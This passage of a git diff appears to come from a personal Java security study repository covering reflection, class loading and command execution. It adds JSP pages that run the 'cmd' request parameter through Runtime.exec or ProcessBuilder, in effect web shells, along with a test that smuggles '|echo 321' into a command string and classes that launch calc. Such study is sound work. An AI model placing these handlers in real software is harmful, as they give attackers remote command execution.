"b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" @@ -0,0 +1,4 @@ +package ser; + +public class Ser01 { +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" new file mode 100644 index 0000000..a4adc65 Binary files /dev/null and "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Person.class" differ diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" new file mode 100644 index 0000000..94ba715 Binary files /dev/null and "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/Student.class" differ diff --git a/JNDI/JNDI_vul/server/pom.xml "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/pom.xml" similarity index 61% rename from JNDI/JNDI_vul/server/pom.xml rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/pom.xml" index 1634d2a..8f2e373 100644 --- a/JNDI/JNDI_vul/server/pom.xml +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/pom.xml" @@ -3,13 +3,10 @@ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - - server + com.test + ClassLoadStudy + 1.0-SNAPSHOT 8 @@ -17,4 +14,12 @@ UTF-8 + + + commons-collections + commons-collections + 3.2.1 + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" new file mode 100644 index 0000000..e20de74 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Baka.java" @@ -0,0 +1,19 @@ +package com.test.pojo; + +public class Baka { + public String name; + + static { + System.out.println("static block"); + } + + public Baka() { + System.out.println("no-arg constructor"); + } + + public Baka(String name) { + this.name = name; + System.out.println("name constructor"); + } + +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" new file mode 100644 index 0000000..287b878 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/pojo/Person.java" @@ -0,0 +1,18 @@ +package com.test.pojo; + +import java.io.IOException; + +public class Person { + public Person() { + try { + System.out.println("Person non-args constructor"); + Runtime.getRuntime().exec("calc"); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + + static { + System.out.println("Person static"); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" new file mode 100644 index 0000000..d901fbe --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" @@ -0,0 +1,20 @@ +package com.test.study; + +import com.test.pojo.Baka; + +public class Loader { + public static void main(String[] args) throws Exception { + Class bakaClass = Baka.class; + System.out.println("================="); +// Class.forName("com.test.pojo.Baka"); // 触发static +// System.out.println("=================="); +// Class.forName("com.test.pojo.Baka", false, ClassLoader.getSystemClassLoader()); // 不触发 +// System.out.println("================="); +// Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader()); // 触发static +// System.out.println("=================="); +// ClassLoader classLoader = ClassLoader.getSystemClassLoader(); +// classLoader.loadClass("com.test.pojo.Baka"); // 无事发生 +// System.out.println("=================="); + Baka baka = Baka.class.newInstance(); // 触发无参构造和static + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" new file mode 100644 index 0000000..0620b0c --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" @@ -0,0 +1,27 @@ +package com.test.study; + +import java.io.IOException; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; +import java.nio.file.Files; +import java.nio.file.Paths; + +public class define2Load { + public static void main(String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException, ClassNotFoundException { + ClassLoader classLoader = define2Load.class.getClassLoader(); + byte[] bytes = Files.readAllBytes(Paths.get("Student.class")); + Class clazz = ClassLoader.class; +// Constructor declaredConstructor = clazz.getDeclaredConstructor(); +// declaredConstructor.setAccessible(true); +// ClassLoader classLoader = declaredConstructor.newInstance(); + Method defineClass = clazz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); + defineClass.setAccessible(true); + Class student = (Class) defineClass.invoke(classLoader, bytes, 0, bytes.length); +// Class.forName("com.test.pojo.Student"); + student.newInstance(); +// Class.forName("com.test.pojo.Student"); + } + + +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" new file mode 100644 index 0000000..3dff7e4 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,7 @@ +package com.test.study; + +public class tmp { + public static void main(String[] args) throws ClassNotFoundException { + Class.forName("com.test.pojo.Student"); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" new file mode 100644 index 0000000..e70c20c --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" @@ -0,0 +1,273 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 1759207487740 + + + + + + + + + + jar://$PROJECT_DIR$/../../../../../../sec_software/jdks/jdk-1.8.0_65/src.zip!/java/lang/Runtime.java + 616 + + + + + \ No newline at end of file diff --git a/hessian/HessianStudy/pom.xml "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" similarity index 58% rename from hessian/HessianStudy/pom.xml rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" index dd82d26..8f470e3 100644 --- a/hessian/HessianStudy/pom.xml +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" @@ -1,11 +1,11 @@ 4.0.0 - com.example - HessianStudy + com.test + RceStudy war 1.0-SNAPSHOT - HessianStudy Maven Webapp + RceStudy Maven Webapp http://maven.apache.org @@ -14,23 +14,18 @@ 3.8.1 test - - com.caucho - hessian - 4.0.63 - javax.servlet - servlet-api - 2.5 + javax.servlet-api + 4.0.1 - com.alibaba - fastjson - 1.2.24 + org.apache.commons + commons-io + 1.3.2 - HessianStudy + RceStudy diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" new file mode 100644 index 0000000..4ca8034 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" @@ -0,0 +1,18 @@ +package com.test; + +import org.apache.commons.io.IOUtils; + +import java.io.IOException; +import java.io.InputStream; + +public class ExecFailed { + public static void main(String[] args) throws IOException { + String origin = "echo 123"; + String evil = "|echo 321"; + String cmd = origin + evil; + InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream(); + System.out.printf(IOUtils.toString(inputStream)); + // 123|echo 321 + // 以空格分割，空格后全是参数，所以管道符没用 + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" new file mode 100644 index 0000000..fde706a --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" @@ -0,0 +1,11 @@ +package com.test; + +import java.io.IOException; + +public class ProcessBuilderExec { + public static void main(String[] args) throws IOException { + String[] cmd = {"cmd", "/c", "calc"}; + ProcessBuilder processBuilder = new ProcessBuilder(cmd); + processBuilder.start(); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" new file mode 100644 index 0000000..c38169b --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" @@ -0,0 +1,5 @@ + + +

Hello World!

+ + diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" new file mode 100644 index 0000000..e4a8e64 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" @@ -0,0 +1,18 @@ +<%@ page import="java.io.InputStream" %> +<%@ page import="java.io.ByteArrayOutputStream" %> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + // 漏洞触发点 + String cmd = request.getParameter("cmd"); + InputStream in = new ProcessBuilder(cmd).start().getInputStream(); + + ByteArrayOutputStream results = new ByteArrayOutputStream(); + + int l = -1; + byte[] b = new byte[1024]; + while ((l = in.read(b)) != -1) { + results.write(b, 0, l); + } + + out.println(results); +%> \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" new file mode 100644 index 0000000..3bf43c4 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" @@ -0,0 +1,30 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/9/30 + Time: 12:50 + To change this template use File | Settings | File Templates. +--%> +<%@ page import="java.io.BufferedReader" %> +<%@ page import="java.io.InputStreamReader" %> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + // 漏洞触发点 + String cmd = request.getParameter("cmd"); + + BufferedReader in = new BufferedReader( + new InputStreamReader( + Runtime.getRuntime().exec(cmd).getInputStream(), + "UTF-8" + ) + ); + + String line; + StringBuilder results = new StringBuilder(); + while ((line = in.readLine()) != null) { + results.append(line); + } + in.close(); + + out.print(results); +%> diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" new file mode 100644 index 0000000..ba1cffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" @@ -0,0 +1,54 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/9/30 + Time: 12:56 + To change this template use File | Settings | File Templates. +--%> +<%@ page import="java.lang.reflect.Constructor" %> +<%@ page import="java.lang.reflect.Method" %> +<%@ page import="java.io.InputStream" %> +<%@ page import="java.io.ByteArrayOutputStream" %> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + // 漏洞触发点 + String c = request.getParameter("cmd"); + + // 根据系统自动调用对应命令 + String[] cmd; + String osName = System.getProperties().getProperty("os.name"); + if (osName.toLowerCase().contains("windows")) { + cmd = new String[]{"cmd", "/c", c}; + } else { + cmd = new String[]{"/bin/bash", "-c", c}; + } + + // 获取Runtime类对象 + Class runtimeClass = Class.forName("java.lang.Runtime"); + + // 获取构造方法 + Constructor runtimeConstructor = runtimeClass.getDeclaredConstructor(); + runtimeConstructor.setAccessible(true); + + // 创建Runtime类实例相当于 Runtime r = new Runtime(); + Object runtimeInstance = runtimeConstructor.newInstance(); + + // 获取Runtime的exec(String cmd)方法 + Method runtimeMethod = runtimeClass.getMethod("exec", String[].class); + + // 调用exec方法等于 r.exec(cmd); cmd参数输入要执行的命令 + Process p = (Process) runtimeMethod.invoke(runtimeInstance, new Object[]{cmd}); + + // 获取命令执行结果 + InputStream in = p.getInputStream(); + + ByteArrayOutputStream results = new ByteArrayOutputStream(); + byte[] b = new byte[1024]; + int l = -1; + + while ((l = in.read(b)) != -1) { + results.write(b, 0, l); + } + + out.print(results); +%> diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git 